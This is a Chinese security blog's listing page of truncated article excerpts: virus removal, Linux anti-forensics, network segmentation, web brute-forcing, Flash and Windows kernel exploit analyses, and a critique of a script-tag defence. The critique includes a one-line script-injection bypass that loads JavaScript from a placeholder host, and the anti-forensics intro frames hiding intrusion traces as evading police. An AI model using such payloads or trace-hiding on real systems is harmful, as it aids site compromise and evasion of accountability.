分类 ‘技术文章’ 下的日志

用WinHEX远程查杀顽固病毒

文章作者:Helvin [E.S.T 顾问团]
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
有个Win2003,跑的服务器不重要,打了补丁很久没重启,前几天蓝屏过,导出蓝屏dmp文件windbg分析,发现Ipnat.sys引起,因为还有其他事情要忙,当时没太在意。今天一看竟然成了肉鸡,疯狂想德国法国的一些80、442、25端口发送包,抓包分析,基本都是病毒体传播和点广告的
病毒本身一共5个文件 srosa.sys hldrrr.exe wintems.exe mdelk.exe 还有一个是放在了Du Meter的自启动下面
冰刃等一些都是“不是有效的win32程序”,杀毒软件更别说了。驱动隐藏驱动、程序、注册表,病毒体、驱动、注册表防删除保护,文件文件夹隐藏设置失效。。。。,因为是远程杀毒,安全模式啥的都不用考虑了。突然看到服务器桌面上装了WinHex,当时爆破一个小软件的时候用的,顺手打开硬盘,找到隐藏的病毒,直接对相应硬盘区域写0,重启。
残留文件删除,注册表清除一下,干净了

Tags: , ,

Linux 入侵踪迹隐藏攻略

文章作者:xi4oyu
Linux 入侵踪迹隐藏攻略v0.1
免责声明:
本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,转载请保留。
0.前言:
被警察叔叔请去喝茶时间很痛苦的事情,各位道长如果功力不够又喜欢出风头的想必都有过这样的“待遇”。如何使自己在系统中隐藏的更深,是我们必须掌握的基本功。当然,如果管理员真的想搞你而他的功力又足够足的话,相信没什么人能够真正的“踏雪无痕”。Forensic 与Anti-Forensic,说到底只是你和管理员之间的技术间较量而已。貌似很少有专门说这个的文章,大部分就是下载个日志擦除的软件,然后运行下就可以了,对小站可以,但对方如果是经验丰富的管理员呢?我们该如何应对?我在这里只介绍unix-like system下的,至于windows或者其他什么系统下的,欢迎各位道友补充。

阅读全文 »

Tags: ,

企业安全扯淡之网络分割

by: 云舒
2008-04-16
http://www.ph4nt0m.org
继续扯淡,今天是网络的分割问题。
网络分割几句话就能说清楚了,不过却是一个很重要并且很麻烦的问题。重要是因为做了分割之后,整体的安全性会好很多;麻烦主要是因为在实施之前整理需求很繁杂,实施之后又需要有长期的维护。
网络分割的原则,就是找到网络中的各个边界,使用路由或者防火墙将其隔离,最好是路由隔离。这里的边界主要是指办公网络和 internet的边界,生产网络和internet的边界,办公网络和生产网络的边界,以及各子公司网络的边界。除了这些比较粗略的分割之外,还应该包括小范围细粒度的划分,这里的网络已经是粗略分割之后的某一部分的分割了,包括办公网络内部按照部门职责进行的分割,生产网络按照相同应用的分割。

阅读全文 »

Tags: ,

WEB暴力破解–我用wvs fuzzer

鬼仔注:以前发过Acunetix Web Vulnerability Scanner V5.1 破解版

Writer: demonalex[at]dark2s[dot]org

讲到WEB暴力破解通过大家都会用小榕的溯雪,但并不是所有WEB破解溯雪都是应付自如的(不要说我说小榕他老人家的坏话),最近因为工作的关系,碰到一个网管型设备的WEBPORTAL需要做WEB破解,看看HTML的源码:

阅读全文 »

Tags: , , , ,

Flash Player漏洞的新利用方法

作者:Sowhat
来源:Sowhat的blog

前两天推荐过Mark Dowd的Paper “Exploiting Flash Reliably”
http://hi.baidu.com/secway/blog/item/242655971275376855fb96d8.html

学习了一下,很好很强大。为以后Flash Player漏洞的利用开辟了一条崭新崭新的道路啊。

简单来说,从Flash9开始,实现了一个ActionScript Virtual Machine (AVM),这个虚拟机首先会验证将要被执行的ActionScript,然后再执行。未经验证的、不可信的ActionScript非常邪恶强大,几乎相当于以Flash Player运行的权限来执行任意代码,所以虚拟机首先要验证ActionScript来源是合法的。
阅读全文 »

Tags: , ,

Windows 内核漏洞 ms08025 分析

来源:安全焦点
Author: Polymorphours
Email: [email protected]
Homepage:http://www.whitecell.org
Date: 2008-04-10

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows 阅读全文 »

Tags: ,

程序从DOS/bios驻留内存到WINNT下监视读入内存数据

作者:成松林
来源:安全焦点
QQ:179641795
Email:[email protected]
注意:欢迎大家转载,请大家转载注明原出处和作者信息.发篇文章不容易..大家请保留作者信息.

.586p ;########################################################################
.model tiny ;#############目的:让程序永久驻留内存,监控读入内存数据.##################
;********************************;#步骤:一层层HOOK,进入保护模式,打开 阅读全文 »

Tags: , , ,

关于<<二行代码解决全部网页木马>>的文章

鬼仔注:前两天发过 <<二行代码解决全部网页木马>>

作者:lcx
来源:vbs小铺

原文在这:http://www.blueidea.com/tech/web/2008/5575.asp

主要目的是用css解决script标签里的http,这种方法治标不治本,我觉得防掉很难的,根治办法就是主机安全,不给别人黑掉的机会

突破方法有N种,最简单的突破办法,不把src=http放在<script>标签里。

代码:
<script>eval(document.write("<script src=http://192.168.8.100/1.js><\/script>"))</script>

Tags: ,